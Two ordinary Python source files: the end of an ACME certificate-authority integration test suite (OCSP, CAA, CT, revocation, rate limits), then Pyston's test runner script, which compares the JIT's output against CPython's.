if resp.body.status is not messages.STATUS_DEACTIVATED:
raise(Exception("unexpected authorization status"))
order = chisel2.auth_and_issue([random_domain()], client=client)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise(Exception("unexpected authorization status"))
def test_ocsp():
cert_file = temppath('test_ocsp.pem')
chisel2.auth_and_issue([random_domain()], cert_output=cert_file.name)
# As OCSP-Updater is generating responses independently of the CA we sit in a loop
# checking OCSP until we either see a good response or we timeout (5s).
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "good")
def test_ct_submission():
hostname = random_domain()
# These should correspond to the configured logs in ra.json.
log_groups = [
["http://boulder:4500/submissions", "http://boulder:4501/submissions"],
["http://boulder:4510/submissions", "http://boulder:4511/submissions"],
]
def submissions(group):
count = 0
for log in group:
count += int(requests.get(log + "?hostnames=%s" % hostname).text)
return count
chisel2.auth_and_issue([hostname])
got = [ submissions(log_groups[0]), submissions(log_groups[1]) ]
expected = [ 1, 2 ]
for i in range(len(log_groups)):
if got[i] < expected[i]:
raise(Exception("For log group %d, got %d submissions, expected %d." %
(i, got[i], expected[i])))
def check_ocsp_basic_oid(cert_file, issuer_file, url):
"""
This function checks if an OCSP response was successful, but doesn't verify
the signature or timestamp. This is useful when simulating the past, so we
don't incorrectly reject a response for being in the past.
"""
ocsp_request = make_ocsp_req(cert_file, issuer_file)
responses = fetch_ocsp(ocsp_request, url)
# An unauthorized response (for instance, if the OCSP responder doesn't know
# about this cert) will just be 30 03 0A 01 06. A "good" or "revoked"
# response will contain, among other things, the id-pkix-ocsp-basic OID
# identifying the response type. We look for that OID to confirm we got a
# successful response.
expected = bytearray.fromhex("06 09 2B 06 01 05 05 07 30 01 01")
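    # (DER breakdown of the bytes above: 06 = OID tag, 09 = length, and
    # 2B 06 01 05 05 07 30 01 01 encodes 1.3.6.1.5.5.7.48.1.1, the
    # id-pkix-ocsp-basic OID.)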
for resp in responses:
if not expected in bytearray(resp):
raise(Exception("Did not receive successful OCSP response: %s doesn't contain %s" %
(base64.b64encode(resp), base64.b64encode(expected))))
ocsp_exp_unauth_setup_data = {}
@register_six_months_ago
def ocsp_exp_unauth_setup():
client = chisel2.make_client(None)
cert_file = temppath('ocsp_exp_unauth_setup.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
# Since our servers are pretending to be in the past, but the openssl cli
# isn't, we'll get an expired OCSP response. Just check that it exists;
# don't do the full verification (which would fail).
check_ocsp_basic_oid(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002")
global ocsp_exp_unauth_setup_data
ocsp_exp_unauth_setup_data['cert_file'] = cert_file.name
def test_ocsp_exp_unauth():
tries = 0
if 'cert_file' not in ocsp_exp_unauth_setup_data:
raise Exception("ocsp_exp_unauth_setup didn't run")
cert_file = ocsp_exp_unauth_setup_data['cert_file']
while tries < 5:
try:
verify_ocsp(cert_file, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "XXX")
raise(Exception("Unexpected return from verify_ocsp"))
except subprocess.CalledProcessError as cpe:
if cpe.output == b"Responder Error: unauthorized (6)\n":
break
except:
pass
tries += 1
time.sleep(0.25)
else:
raise(Exception("timed out waiting for unauthorized OCSP response for expired certificate"))
def test_blocked_key_account():
# Only config-next has a blocked keys file configured.
if not CONFIG_NEXT:
return
with open("test/test-ca.key", "rb") as key_file:
key = serialization.load_pem_private_key(key_file.read(), password=None, backend=default_backend())
# Create a client with the JWK set to a blocked private key
jwk = josepy.JWKRSA(key=key)
client = chisel2.uninitialized_client(jwk)
email = "test@not-example.com"
# Try to create an account
testPass = False
try:
client.new_account(messages.NewRegistration.from_data(email=email,
terms_of_service_agreed=True))
except acme_errors.Error as e:
if e.typ != "urn:ietf:params:acme:error:badPublicKey":
raise(Exception("problem did not have correct error type, had {0}".format(e.typ)))
if e.detail != "public key is forbidden":
raise(Exception("problem did not have correct error detail, had {0}".format(e.detail)))
testPass = True
if testPass is False:
raise(Exception("expected account creation to fail with Error when using blocked key"))
def test_blocked_key_cert():
# Only config-next has a blocked keys file configured.
if not CONFIG_NEXT:
return
with open("test/test-ca.key", "r") as f:
pemBytes = f.read()
domains = [random_domain(), random_domain()]
csr = acme_crypto_util.make_csr(pemBytes, domains, False)
client = chisel2.make_client(None)
order = client.new_order(csr)
authzs = order.authorizations
testPass = False
cleanup = chisel2.do_http_challenges(client, authzs)
try:
order = client.poll_and_finalize(order)
except acme_errors.Error as e:
if e.typ != "urn:ietf:params:acme:error:badCSR":
raise(Exception("problem did not have correct error type, had {0}".format(e.typ)))
if e.detail != "Error finalizing order :: invalid public key in CSR: public key is forbidden":
raise(Exception("problem did not have correct error detail, had {0}".format(e.detail)))
testPass = True
if testPass is False:
raise(Exception("expected cert creation to fail with Error when using blocked key"))
def test_expiration_mailer():
email_addr = "integration.%x@letsencrypt.org" % random.randrange(2**16)
order = chisel2.auth_and_issue([random_domain()], email=email_addr)
cert = parse_cert(order)
# Check that the expiration mailer sends a reminder
expiry = cert.not_valid_after
no_reminder = expiry + datetime.timedelta(days=-31)
first_reminder = expiry + datetime.timedelta(days=-13)
last_reminder = expiry + datetime.timedelta(days=-2)
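    # localhost:9381 is assumed to be the integration test mail server: POST
    # /clear resets its stored mail and GET /count?to=... reports how many
    # messages were sent to a given address.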
requests.post("http://localhost:9381/clear", data='')
for time in (no_reminder, first_reminder, last_reminder):
print(get_future_output(
["./bin/expiration-mailer", "--config", "%s/expiration-mailer.json" % config_dir],
time))
resp = requests.get("http://localhost:9381/count?to=%s" % email_addr)
mailcount = int(resp.text)
if mailcount != 2:
raise(Exception("\nExpiry mailer failed: expected 2 emails, got %d" % mailcount))
caa_recheck_setup_data = {}
@register_twenty_days_ago
def caa_recheck_setup():
client = chisel2.make_client()
# Issue a certificate with the clock set back, and save the authzs to check
# later that they are valid (200). They should however require rechecking for
# CAA purposes.
numNames = 10
# Generate numNames subdomains of a random domain
base_domain = random_domain()
domains = [ "{0}.{1}".format(str(n),base_domain) for n in range(numNames) ]
order = chisel2.auth_and_issue(domains, client=client)
global caa_recheck_setup_data
caa_recheck_setup_data = {
'client': client,
'authzs': order.authorizations,
}
def test_recheck_caa():
"""Request issuance for a domain where we have a old cached authz from when CAA
was good. We'll set a new CAA record forbidding issuance; the CAA should
recheck CAA and reject the request.
"""
if 'authzs' not in caa_recheck_setup_data:
raise(Exception("CAA authzs not prepared for test_caa"))
domains = []
for a in caa_recheck_setup_data['authzs']:
response = caa_recheck_setup_data['client']._post(a.uri, None)
if response.status_code != 200:
raise(Exception("Unexpected response for CAA authz: ",
response.status_code))
domain = a.body.identifier.value
domains.append(domain)
# Set a forbidding CAA record on just one domain
challSrv.add_caa_issue(domains[3], ";")
# Request issuance for the previously-issued domain name, which should
# now be denied due to CAA.
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue(domains, client=caa_recheck_setup_data['client']))
def test_caa_good():
domain = random_domain()
challSrv.add_caa_issue(domain, "happy-hacker-ca.invalid")
chisel2.auth_and_issue([domain])
def test_caa_reject():
domain = random_domain()
challSrv.add_caa_issue(domain, "sad-hacker-ca.invalid")
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue([domain]))
def test_caa_extensions():
goodCAA = "happy-hacker-ca.invalid"
client = chisel2.make_client()
caa_account_uri = client.net.account.uri
caa_records = [
{"domain": "accounturi.good-caa-reserved.com", "value":"{0}; accounturi={1}".format(goodCAA, caa_account_uri)},
{"domain": "dns-01-only.good-caa-reserved.com", "value": "{0}; validationmethods=dns-01".format(goodCAA)},
{"domain": "http-01-only.good-caa-reserved.com", "value": "{0}; validationmethods=http-01".format(goodCAA)},
{"domain": "dns-01-or-http01.good-caa-reserved.com", "value": "{0}; validationmethods=dns-01,http-01".format(goodCAA)},
]
for policy in caa_records:
challSrv.add_caa_issue(policy["domain"], policy["value"])
# TODO(@4a6f656c): Once the `CAAValidationMethods` feature flag is enabled by
# default, remove this early return.
if not CONFIG_NEXT:
return
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue(["dns-01-only.good-caa-reserved.com"], chall_type="http-01"))
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue(["http-01-only.good-caa-reserved.com"], chall_type="dns-01"))
## Note: the additional names are to avoid rate limiting...
chisel2.auth_and_issue(["dns-01-only.good-caa-reserved.com", "www.dns-01-only.good-caa-reserved.com"], chall_type="dns-01")
chisel2.auth_and_issue(["http-01-only.good-caa-reserved.com", "www.http-01-only.good-caa-reserved.com"], chall_type="http-01")
chisel2.auth_and_issue(["dns-01-or-http-01.good-caa-reserved.com", "dns-01-only.good-caa-reserved.com"], chall_type="dns-01")
chisel2.auth_and_issue(["dns-01-or-http-01.good-caa-reserved.com", "http-01-only.good-caa-reserved.com"], chall_type="http-01")
## CAA should fail with an arbitrary account, but succeed with the CAA client.
chisel2.expect_problem("urn:ietf:params:acme:error:caa", lambda: chisel2.auth_and_issue(["accounturi.good-caa-reserved.com"]))
chisel2.auth_and_issue(["accounturi.good-caa-reserved.com"], client=client)
def test_account_update():
"""
    Create a new ACME client/account with one contact email. Then update the
    account twice, each time to a different contact email.
"""
emails=("initial-email@not-example.com", "updated-email@not-example.com", "another-update@not-example.com")
client = chisel2.make_client(email=emails[0])
for email in emails[1:]:
result = chisel2.update_email(client, email=email)
# We expect one contact in the result
if len(result.body.contact) != 1:
raise(Exception("\nUpdate account failed: expected one contact in result, got 0"))
# We expect it to be the email we just updated to
actual = result.body.contact[0]
if actual != "mailto:"+email:
raise(Exception("\nUpdate account failed: expected contact %s, got %s" % (email, actual)))
def test_renewal_exemption():
"""
Under a single domain, issue one certificate, then two renewals of that
certificate, then one more different certificate (with a different
subdomain). Since the certificatesPerName rate limit in testing is 2 per 90
days, and the renewals should be discounted under the renewal exemption,
each of these issuances should succeed. Then do one last issuance that we
expect to be rate limited, just to check that the rate limit is actually 2,
and we are testing what we think we are testing. See
https://letsencrypt.org/docs/rate-limits/ for more details.
"""
base_domain = random_domain()
# First issuance
chisel2.auth_and_issue(["www." + base_domain])
# First Renewal
chisel2.auth_and_issue(["www." + base_domain])
# Second Renewal
chisel2.auth_and_issue(["www." + base_domain])
# Issuance of a different cert
chisel2.auth_and_issue(["blog." + base_domain])
# Final, failed issuance, for another different cert
chisel2.expect_problem("urn:ietf:params:acme:error:rateLimited",
lambda: chisel2.auth_and_issue(["mail." + base_domain]))
def test_certificates_per_name():
chisel2.expect_problem("urn:ietf:params:acme:error:rateLimited",
lambda: chisel2.auth_and_issue([random_domain() + ".lim.it"]))
def test_oversized_csr():
# Number of names is chosen to be one greater than the configured RA/CA maxNames
numNames = 101
# Generate numNames subdomains of a random domain
base_domain = random_domain()
domains = [ "{0}.{1}".format(str(n),base_domain) for n in range(numNames) ]
# We expect issuing for these domains to produce a malformed error because
# there are too many names in the request.
chisel2.expect_problem("urn:ietf:params:acme:error:malformed",
lambda: chisel2.auth_and_issue(domains))
def parse_cert(order):
return x509.load_pem_x509_certificate(order.fullchain_pem.encode(), default_backend())
def test_admin_revoker_cert():
cert_file = temppath('test_admin_revoker_cert.pem')
order = chisel2.auth_and_issue([random_domain()], cert_output=cert_file.name)
parsed_cert = parse_cert(order)
# Revoke certificate by serial
reset_akamai_purges()
run(["./bin/admin-revoker", "serial-revoke",
"--config", "%s/admin-revoker.json" % config_dir,
'%x' % parsed_cert.serial_number, '1'])
# Wait for OCSP response to indicate revocation took place
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_admin_revoker_batched():
serialFile = tempfile.NamedTemporaryFile(
dir=tempdir, suffix='.test_admin_revoker_batched.serials.hex',
mode='w+', delete=False)
cert_files = [
temppath('test_admin_revoker_batched.%d.pem' % x) for x in range(3)
]
for cert_file in cert_files:
order = chisel2.auth_and_issue([random_domain()], cert_output=cert_file.name)
serialFile.write("%x\n" % parse_cert(order).serial_number)
serialFile.close()
run(["./bin/admin-revoker", "batched-serial-revoke",
"--config", "%s/admin-revoker.json" % config_dir,
serialFile.name, '0', '2'])
for cert_file in cert_files:
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
def test_sct_embedding():
order = chisel2.auth_and_issue([random_domain()])
cert = parse_cert(order)
# make sure there is no poison extension
try:
cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.3"))
raise(Exception("certificate contains CT poison extension"))
except x509.ExtensionNotFound:
# do nothing
pass
# make sure there is a SCT list extension
try:
sctList = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.2"))
except x509.ExtensionNotFound:
raise(Exception("certificate doesn't contain SCT list extension"))
if len(sctList.value) != 2:
raise(Exception("SCT list contains wrong number of SCTs"))
for sct in sctList.value:
if sct.version != x509.certificate_transparency.Version.v1:
raise(Exception("SCT contains wrong version"))
if sct.entry_type != x509.certificate_transparency.LogEntryType.PRE_CERTIFICATE:
raise(Exception("SCT contains wrong entry type"))
delta = sct.timestamp - datetime.datetime.now()
if abs(delta) > datetime.timedelta(hours=1):
raise(Exception("Delta between SCT timestamp and now was too great "
"%s vs %s (%s)" % (sct.timestamp, datetime.datetime.now(), delta)))
def test_auth_deactivation():
client = chisel2.make_client(None)
d = random_domain()
csr_pem = chisel2.make_csr([d])
order = client.new_order(csr_pem)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise Exception("unexpected authorization status")
order = chisel2.auth_and_issue([random_domain()], client=client)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise Exception("unexpected authorization status")
def get_ocsp_response_and_reason(cert_file, issuer_file, url):
"""Returns the ocsp response output and revocation reason."""
output = verify_ocsp(cert_file, issuer_file, url, None)
    m = re.search(r'Reason: (\w+)', output)
reason = m.group(1) if m is not None else ""
return output, reason
ocsp_resigning_setup_data = {}
@register_twenty_days_ago
def ocsp_resigning_setup():
"""Issue and then revoke a cert in the past.
Useful setup for test_ocsp_resigning, which needs to check that the
    revocation reason is still correctly set after re-signing an old OCSP
    response.
"""
client = chisel2.make_client(None)
cert_file = temppath('ocsp_resigning_setup.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
# Revoke for reason 1: keyCompromise
client.revoke(josepy.ComparableX509(cert), 1)
ocsp_response, reason = get_ocsp_response_and_reason(
cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002")
global ocsp_resigning_setup_data
ocsp_resigning_setup_data = {
'cert_file': cert_file.name,
'response': ocsp_response,
'reason': reason
}
def test_ocsp_resigning():
"""Check that, after re-signing an OCSP, the reason is still set."""
if 'response' not in ocsp_resigning_setup_data:
raise Exception("ocsp_resigning_setup didn't run")
tries = 0
while tries < 5:
resp, reason = get_ocsp_response_and_reason(
ocsp_resigning_setup_data['cert_file'], "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002")
if resp != ocsp_resigning_setup_data['response']:
break
tries += 1
time.sleep(0.25)
else:
raise(Exception("timed out waiting for re-signed OCSP response for certificate"))
if reason != ocsp_resigning_setup_data['reason']:
raise(Exception("re-signed ocsp response has different reason %s expected %s" % (
reason, ocsp_resigning_setup_data['reason'])))
if reason != "keyCompromise":
raise(Exception("re-signed ocsp response has wrong reason %s" % reason))
tester.py
# Copyright (c) 2014-2015 Dropbox, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
import Queue
import argparse
import cPickle
import datetime
import functools
import glob
import os
import re
import resource
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
NUM_THREADS = 1
IMAGE = "pyston_dbg"
KEEP_GOING = False
FN_JUST_SIZE = 20
EXTRA_JIT_ARGS = []
TIME_LIMIT = 25
TESTS_TO_SKIP = []
EXIT_CODE_ONLY = False
SKIP_FAILING_TESTS = False
VERBOSE = 1
PYTHONIOENCODING = 'utf-8'
# For fun, can test pypy.
# Tough because the tester will check to see if the error messages are exactly the
# same as the system CPython, but the error messages change over micro CPython versions.
# Pyston compile-time checks the system CPython version to try to give compatible error messages.
TEST_PYPY = 0
def set_ulimits():
# Guard the process from running too long with a hard rlimit.
# But first try to kill it after a second with a SIGALRM, though that's catchable/clearable by the program:
signal.alarm(TIME_LIMIT)
resource.setrlimit(resource.RLIMIT_CPU, (TIME_LIMIT + 1, TIME_LIMIT + 1))
MAX_MEM_MB = 100
resource.setrlimit(resource.RLIMIT_RSS, (MAX_MEM_MB * 1024 * 1024, MAX_MEM_MB * 1024 * 1024))
EXTMODULE_DIR = None
EXTMODULE_DIR_PYSTON = None
THIS_FILE = os.path.abspath(__file__)
_global_mtime = None
def get_global_mtime():
global _global_mtime
if _global_mtime is not None:
return _global_mtime
# Start off by depending on the tester itself
rtn = os.stat(THIS_FILE).st_mtime
assert os.listdir(EXTMODULE_DIR), EXTMODULE_DIR
for fn in os.listdir(EXTMODULE_DIR):
if not fn.endswith(".so"):
continue
rtn = max(rtn, os.stat(os.path.join(EXTMODULE_DIR, fn)).st_mtime)
_global_mtime = rtn
return rtn
def get_expected_output(fn):
sys.stdout.flush()
assert fn.endswith(".py")
expected_fn = fn[:-3] + ".expected"
if os.path.exists(expected_fn):
return 0, open(expected_fn).read(), ""
cache_fn = fn[:-3] + ".expected_cache"
if os.path.exists(cache_fn):
cache_mtime = os.stat(cache_fn).st_mtime
if cache_mtime > os.stat(fn).st_mtime and cache_mtime > get_global_mtime():
try:
return cPickle.load(open(cache_fn))
except (EOFError, ValueError):
pass
# TODO don't suppress warnings globally:
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR
env["PYTHONIOENCODING"] = PYTHONIOENCODING
p = subprocess.Popen(["python", "-Wignore", fn], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"), preexec_fn=set_ulimits, env=env)
out, err = p.communicate()
code = p.wait()
r = code, out, err
assert code >= 0, "CPython exited with an unexpected exit code: %d" % (code,)
cPickle.dump(r, open(cache_fn, 'w'))
return r
def canonicalize_stderr(stderr):
"""
For a while we were trying to maintain *exact* stderr compatibility with CPython,
at least for the last line of the stderr.
It was starting to get silly to do this, so instead apply some "canonicalizations"
to map certain groups of error messages together.
"""
stderr = stderr.strip().split('\n')[-1]
substitutions = [
("NameError: global name '", "NameError: name '"),
("AttributeError: '(\w+)' object attribute '(\w+)' is read-only", "AttributeError: \\2"),
(r"TypeError: object.__new__\(\) takes no parameters", "TypeError: object() takes no parameters"),
("IndexError: list assignment index out of range", "IndexError: list index out of range"),
(r"unqualified exec is not allowed in function '(\w+)' it (.*)",
r"unqualified exec is not allowed in function '\1' because it \2"),
]
for pattern, subst_with in substitutions:
stderr = re.sub(pattern, subst_with, stderr)
return stderr
failed = []
class Options(object): pass
# returns a single string, or a tuple of strings that are spliced together (with spaces between) by our caller
def run_test(fn, check_stats, run_memcheck):
opts = get_test_options(fn, check_stats, run_memcheck)
del check_stats, run_memcheck
if opts.skip:
return "(skipped: %s)" % opts.skip
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR_PYSTON
env["PYTHONIOENCODING"] = PYTHONIOENCODING
run_args = [os.path.abspath(IMAGE)] + opts.jit_args + [fn]
start = time.time()
p = subprocess.Popen(run_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"),
preexec_fn=set_ulimits, env=env)
out, stderr = p.communicate()
code = p.wait()
elapsed = time.time() - start
if code >= 128:
code -= 256
return determine_test_result(fn, opts, code, out, stderr, elapsed)
def get_test_options(fn, check_stats, run_memcheck):
opts = Options()
opts.check_stats = check_stats
opts.run_memcheck = run_memcheck
opts.statchecks = []
opts.jit_args = ["-rq"] + EXTRA_JIT_ARGS
opts.collect_stats = True
opts.expected = "success"
opts.should_error = False
opts.allow_warnings = []
opts.skip = None
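    # Test files configure the harness through leading "#" directives, parsed
    # below. A hypothetical header (flag values and stat names are made up for
    # illustration) might look like:
    #   # skip-if: '-O' in EXTRA_JIT_ARGS
    #   # run_args: -n
    #   # statcheck: noninit_count('slowpath_runtimecall') < 20
    #   # expected: fail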
for l in open(fn):
l = l.strip()
if not l:
continue
if not l.startswith("#"):
break
if l.startswith("# statcheck:"):
l = l[len("# statcheck:"):].strip()
opts.statchecks.append(l)
elif l.startswith("# run_args:"):
l = l[len("# run_args:"):].split()
opts.jit_args += l
elif l.startswith("# expected:"):
opts.expected = l[len("# expected:"):].strip()
elif l.startswith("# should_error"):
opts.should_error = True
elif l.startswith("# fail-if:"):
condition = l.split(':', 1)[1].strip()
if eval(condition):
opts.expected = "fail"
elif l.startswith("# skip-if:"):
skip_if = l[len("# skip-if:"):].strip()
if eval(skip_if):
opts.skip = "skip-if: %s" % skip_if[:30]
elif l.startswith("# allow-warning:"):
opts.allow_warnings.append("Warning: " + l.split(':', 1)[1].strip())
elif l.startswith("# no-collect-stats"):
opts.collect_stats = False
if not opts.skip:
# consider other reasons for skipping file
if SKIP_FAILING_TESTS and opts.expected == 'fail':
opts.skip = 'expected to fail'
elif os.path.basename(fn).split('.')[0] in TESTS_TO_SKIP:
opts.skip = 'command line option'
assert opts.expected in ("success", "fail", "statfail"), opts.expected
if TEST_PYPY:
opts.jit_args = []
opts.collect_stats = False
opts.check_stats = False
opts.expected = "success"
if opts.collect_stats:
opts.jit_args = ['-s'] + opts.jit_args
return opts
def diff_output(expected, received, expected_file_prefix, received_file_prefix):
exp_fd, exp_fn = tempfile.mkstemp(prefix=expected_file_prefix)
rec_fd, rec_fn = tempfile.mkstemp(prefix=received_file_prefix)
os.fdopen(exp_fd, 'w').write(expected)
os.fdopen(rec_fd, 'w').write(received)
p = subprocess.Popen(["diff", "--unified=5", "-a", exp_fn, rec_fn], stdout=subprocess.PIPE, preexec_fn=set_ulimits)
diff = p.stdout.read()
assert p.wait() in (0, 1)
os.unlink(exp_fn)
os.unlink(rec_fn)
return diff
def determine_test_result(fn, opts, code, out, stderr, elapsed):
if opts.allow_warnings:
out_lines = []
for l in out.split('\n'):
for regex in opts.allow_warnings:
if re.match(regex, l):
break
else:
out_lines.append(l)
out = "\n".join(out_lines)
stats = None
if opts.collect_stats:
stats = {}
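        # Judging from the parsing below, "-s" runs are expected to embed a
        # block like the following in stderr (illustrative sketch only):
        #   Stats:
        #   ...other stats...
        #   Counters:
        #   some_counter: 12
        #   (End of stats)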
have_stats = (stderr.count("Stats:") == 1 and stderr.count("(End of stats)") == 1)
if code >= 0:
assert have_stats
if have_stats:
assert stderr.count("Stats:") == 1
stderr, stats_str = stderr.split("Stats:")
stats_str, stderr_tail = stats_str.split("(End of stats)\n")
stderr += stderr_tail
other_stats_str, counter_str = stats_str.split("Counters:")
for l in counter_str.strip().split('\n'):
assert l.count(':') == 1, l
k, v = l.split(':')
stats[k.strip()] = int(v)
last_stderr_line = stderr.strip().split('\n')[-1]
if EXIT_CODE_ONLY:
# fools the rest of this function into thinking the output is OK & just checking the exit code.
# there oughtta be a cleaner way to do this.
expected_code, expected_out, expected_err = 0, out, stderr
else:
# run CPython to get the expected output
expected_code, expected_out, expected_err = get_expected_output(fn)
color = 31 # red
if code != expected_code:
if code == 0:
err = "(Unexpected success)"
else:
err = last_stderr_line
if code == -signal.SIGALRM:
msg = "Timed out"
color = 33 # yellow
elif code == -signal.SIGKILL:
msg = "Killed!"
else:
msg = "Exited with code %d (expected code %d)" % (code, expected_code)
if opts.expected == "fail":
return "Expected failure (got code %d, should be %d)" % (code, expected_code)
elif KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (%s)\n%s" % (color, msg, stderr)
else:
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
raise Exception("%s\n%s\n%s" % (msg, err, stderr))
elif opts.should_error == (code == 0):
if code == 0:
msg = "Exited successfully; remove '# should_error' if this is expected"
else:
msg = "Exited with code %d; add '# should_error' if this is expected" % code
if KEEP_GOING:
failed.append(fn)
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
# show last line of stderr so we have some idea went wrong
print "Last line of stderr: " + last_stderr_line
raise Exception(msg)
elif out != expected_out:
if opts.expected == "fail":
return "Expected failure (bad output)"
else:
diff = diff_output(expected_out, out, "expected_", "received_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad output)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad output)" % (color,)
else:
raise Exception("Failed on %s:\n%s" % (fn, diff))
elif not TEST_PYPY and canonicalize_stderr(stderr) != canonicalize_stderr(expected_err):
if opts.expected == "fail":
return "Expected failure (bad stderr)"
else:
diff = diff_output(expected_err, stderr, "expectederr_", "receivederr_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad stderr)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad stderr)" % (color,)
else:
raise Exception((canonicalize_stderr(stderr), canonicalize_stderr(expected_err)))
elif opts.expected == "fail":
if KEEP_GOING:
failed.append(fn)
return "\033[31mFAILED\033[0m (unexpected success)"
raise Exception("Unexpected success on %s" % fn)
r = ("Correct output (%5.1fms)" % (elapsed * 1000,),)
if opts.check_stats:
def noninit_count(s):
return stats.get(s, 0) - stats.get("_init_" + s, 0)
for l in opts.statchecks:
test = eval(l)
if not test:
if opts.expected == "statfail":
r += ("(expected statfailure)",)
break
elif KEEP_GOING:
failed.append(fn)
return r + ("\033[31mFailed statcheck\033[0m",)
else:
m = re.match("""stats\[['"]([\w_]+)['"]]""", l)
if m:
statname = m.group(1)
raise Exception((l, statname, stats[statname]))
m = re.search("""noninit_count\(['"]([\w_]+)['"]\)""", l)
if m:
statname = m.group(1)
raise Exception((l, statname, noninit_count(statname)))
raise Exception((l, stats))
else:
# only can get here if all statchecks passed
if opts.expected == "statfail":
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mUnexpected statcheck success\033[0m",)
else:
raise Exception(("Unexpected statcheck success!", statchecks, stats))
else:
r += ("(ignoring stats)",)
if opts.run_memcheck:
if code == 0:
start = time.time()
p = subprocess.Popen(["valgrind", "--tool=memcheck", "--leak-check=no"] + run_args, stdout=open("/dev/null", 'w'), stderr=subprocess.PIPE, stdin=open("/dev/null"))
out, err = p.communicate()
assert p.wait() == 0
if "Invalid read" not in err:
elapsed = (time.time() - start)
r += ("Memcheck passed (%4.1fs)" % (elapsed,),)
else:
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mMEMCHECKS FAILED\033[0m",)
else:
raise Exception(err)
else:
r += ("(Skipping memchecks)",)
return r
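# Worker-pool plumbing: test jobs are pushed onto q, worker threads run them and
# store the outcome in results, and cv wakes the main thread as each result arrives.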
q = Queue.Queue()
cv = threading.Condition()
results = {}
quit = {}
def worker_thread():
while not quit:
try:
job = q.get()
if job is None:
break
results[job[0]] = run_test(*job)
with cv:
cv.notifyAll()
except:
import traceback
# traceback.print_exc()
quit[job[0]] = job[0] + ':\n' + traceback.format_exc()
results[job[0]] = None
with cv:
cv.notifyAll()
# os._exit(-1)
def fileSize(fn):
return os.stat(fn).st_size
# return len(list(open(fn)))
# our arguments
parser = argparse.ArgumentParser(description='Runs Pyston tests.')
parser.add_argument('-m', '--run-memcheck', action='store_true', help='run memcheck')
parser.add_argument('-j', '--num-threads', metavar='N', type=int, default=NUM_THREADS,
help='number of threads')
parser.add_argument('-k', '--keep-going', default=KEEP_GOING, action='store_true',
help='keep going after test failure')
parser.add_argument('-R', '--image', default=IMAGE,
help='the executable to test (default: %s)' % IMAGE)
parser.add_argument('-K', '--no-keep-going', dest='keep_going', action='store_false',
help='quit after test failure')
parser.add_argument('-a', '--extra-args', default=[], action='append',
help="additional arguments to pyston (must be invoked with equal sign: -a=-ARG)")
parser.add_argument('-t', '--time-limit', type=int, default=TIME_LIMIT,
help='set time limit in seconds for each test')
parser.add_argument('-s', '--skip-tests', type=str, default='',
help='tests to skip (comma-separated)')
parser.add_argument('-e', '--exit-code-only', action='store_true',
help="only check exit code; don't run CPython to get expected output to compare against")
parser.add_argument('--skip-failing', action='store_true',
help="skip tests expected to fail")
parser.add_argument('--order-by-mtime', action='store_true',
help="order test execution by modification time, instead of file size")
parser.add_argument('test_dir')
parser.add_argument('pattern', nargs='*')
def main(orig_dir):
global KEEP_GOING
global IMAGE
global EXTRA_JIT_ARGS
global TIME_LIMIT
global TEST_DIR
global FN_JUST_SIZE
global TESTS_TO_SKIP
global EXIT_CODE_ONLY
global SKIP_FAILING_TESTS
global VERBOSE
global EXTMODULE_DIR_PYSTON
global EXTMODULE_DIR
run_memcheck = False
opts = parser.parse_args()
run_memcheck = opts.run_memcheck
NUM_THREADS = opts.num_threads
IMAGE = os.path.join(orig_dir, opts.image)
KEEP_GOING = opts.keep_going
EXTRA_JIT_ARGS += opts.extra_args
TIME_LIMIT = opts.time_limit
TESTS_TO_SKIP = opts.skip_tests.split(',')
